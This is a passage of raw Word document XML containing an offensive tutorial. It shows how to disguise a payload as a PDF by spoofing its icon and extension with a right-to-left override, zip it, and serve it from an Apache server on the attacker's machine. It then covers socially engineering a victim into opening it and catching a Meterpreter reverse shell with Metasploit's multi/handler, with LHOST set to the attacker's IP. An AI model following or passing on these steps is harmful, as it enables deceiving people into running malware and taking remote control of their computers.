        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53249B0B" w14:textId="3E5CD5F4" w:rsidR="007E0B97" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768ACC4B" w14:textId="77777777" w:rsidR="007E0B97" w:rsidRPr="00A63E63" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Now our payload is ready.(icon as well as extension has been spoofed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CC472A" w14:textId="77777777" w:rsidR="007E0B97" w:rsidRPr="00A63E63" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A88CD22" w14:textId="432D8B7E" w:rsidR="007E0B97" w:rsidRPr="00A63E63" w:rsidRDefault="007E0B97" w:rsidP="007E0B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7731AA91" wp14:editId="4769862B">
            <wp:extent cx="1112616" cy="142506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112616" cy="1425063"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D32D2" w14:textId="1C2F7CD3" w:rsidR="007E0B97" w:rsidRPr="00A63E63" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>COMPRESSING THE FILE INTO ZIP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E8952C" w14:textId="4DDEA800" w:rsidR="00DC00ED" w:rsidRPr="00A63E63" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>It is seen sometimes that after getting downloaded into another system,the right to left override is removed by the browser.So we will compress the file into zip file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DFF70A" w14:textId="40DD342C" w:rsidR="00DC00ED" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Brush Script MT" w:hAnsi="Brush Script MT"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Brush Script MT" w:hAnsi="Brush Script MT"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A0EFA20" wp14:editId="4B9E4B8E">
            <wp:extent cx="1196444" cy="127265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196444" cy="1272650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01274DF6" w14:textId="69B78891" w:rsidR="00DC00ED" w:rsidRPr="00A63E63" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>STARTING THE APACHE WEB SERVER FOR FILE DELIVERY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF6C163" w14:textId="77777777" w:rsidR="00DC00ED" w:rsidRPr="00A63E63" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Now we will start the apache2 web server in our attacker’s machine.This can be done using the command “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>service apache2 start</w:t>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>”.We can also check whether it is running or not using the command “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>service apache2 status”</w:t>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.We will place the zip file in “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/var/www/html”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FF22A7" w14:textId="77777777" w:rsidR="00DC00ED" w:rsidRPr="00DC00ED" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D47CB2" w14:textId="33F9F0FA" w:rsidR="00DC00ED" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169E6B15" w14:textId="567ECA50" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5924360E" w14:textId="5D3A8C81" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A2D0D67" w14:textId="1D67E869" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="468D31E8" w14:textId="31C06F05" w:rsidR="00DC00ED" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6FCF36" w14:textId="59E79388" w:rsidR="00DC00ED" w:rsidRPr="00DC00ED" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC00ED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2413BBDF" wp14:editId="7278E9B3">
            <wp:extent cx="5428723" cy="273240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5431159" cy="2733631"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B48390B" w14:textId="1BE53302" w:rsidR="007E0B97" w:rsidRPr="00A63E63" w:rsidRDefault="007E0B97" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E28F12" w14:textId="610C2F0C" w:rsidR="00DC00ED" w:rsidRPr="00A63E63" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SOCIAL ENGINEERING THE VICTIM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAEE230" w14:textId="646D4DB6" w:rsidR="00DC00ED" w:rsidRPr="00A63E63" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Now the victim clicks on the link and download the file in the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B75C14B" w14:textId="0044BB64" w:rsidR="00DC00ED" w:rsidRPr="00A63E63" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3358F566" wp14:editId="76CB0F36">
            <wp:extent cx="3619814" cy="164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619814" cy="1646063"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20645963" w14:textId="77777777" w:rsidR="00DC00ED" w:rsidRPr="00A63E63" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Here is the downloaded file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D5A95E" w14:textId="67E59105" w:rsidR="00DC00ED" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4001F7E4" wp14:editId="268FB0AF">
            <wp:extent cx="1257299" cy="335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1263767" cy="337005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF94E12" w14:textId="77777777" w:rsidR="00A63E63" w:rsidRDefault="00A63E63" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E00C05E" w14:textId="2DE0C99D" w:rsidR="00DC00ED" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A3626E" w14:textId="4E03D9FF" w:rsidR="00DC00ED" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04CEE2C8" w14:textId="0FDECFA7" w:rsidR="00DC00ED" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F69666" w14:textId="77777777" w:rsidR="00DC00ED" w:rsidRPr="00A63E63" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63E63">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Lets extract the zip file.The payload we got after extracting the zip is harldy recognizable as a payload.The icon is of pdf and it also has an extension of pdf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D0E799" w14:textId="0C3650B5" w:rsidR="00DC00ED" w:rsidRDefault="00DC00ED" w:rsidP="00A63E63">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Brush Script MT" w:hAnsi="Brush Script MT"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="176DEDD5" wp14:editId="6F49D2FA">
            <wp:extent cx="4587638" cy="7087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4587638" cy="708721"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC2E508" w14:textId="2861A425" w:rsidR="00DC00ED" w:rsidRPr="00A62FAA" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GETTING OUR REVERSE SHELL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE93DBD" w14:textId="77777777" w:rsidR="00DC00ED" w:rsidRPr="00A62FAA" w:rsidRDefault="00DC00ED" w:rsidP="00DC00ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Lets setup the reverse listener on our attacker’s machine and listen for incoming connection.We will be using “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exploit/multi/handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>” module of Metasploit in order to listen for incoming connection.We will set the payload as “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>”,set LHOST to be “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ATTACKER’S IP” and LPORT as the required one.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Here we will be using port 123.Now it will listen for incoming reverse connection from the victim’s machine.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04F2616B" wp14:editId="72536095">
            <wp:extent cx="5420230" cy="27863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427056" cy="2789889"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAC1A25" w14:textId="25A47647" w:rsidR="00A63E63" w:rsidRPr="00F76D68" w:rsidRDefault="00A63E63" w:rsidP="00A63E63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Now lets open the spoofed pdf file in the victim’s computer.When we will open it ,we can see the content of the pdf file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A5963" w14:textId="082AAB62" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00F76D68">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67FD7171" w14:textId="00F5E7A7" w:rsidR="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00F76D68">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C49ED9" w14:textId="77777777" w:rsidR="00F76D68" w:rsidRPr="00F76D68" w:rsidRDefault="00F76D68" w:rsidP="00F76D68">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D72FE3" w14:textId="54A92F50" w:rsidR="00A63E63" w:rsidRPr="00A62FAA" w:rsidRDefault="00A63E63" w:rsidP="00A63E63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E14B18D" w14:textId="3AEC3C73" w:rsidR="00A63E63" w:rsidRPr="00A62FAA" w:rsidRDefault="00A63E63" w:rsidP="00A63E63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D7D388" w14:textId="63DA7F22" w:rsidR="00A63E63" w:rsidRPr="00A62FAA" w:rsidRDefault="00A63E63" w:rsidP="00A63E63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62FAA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular"/>
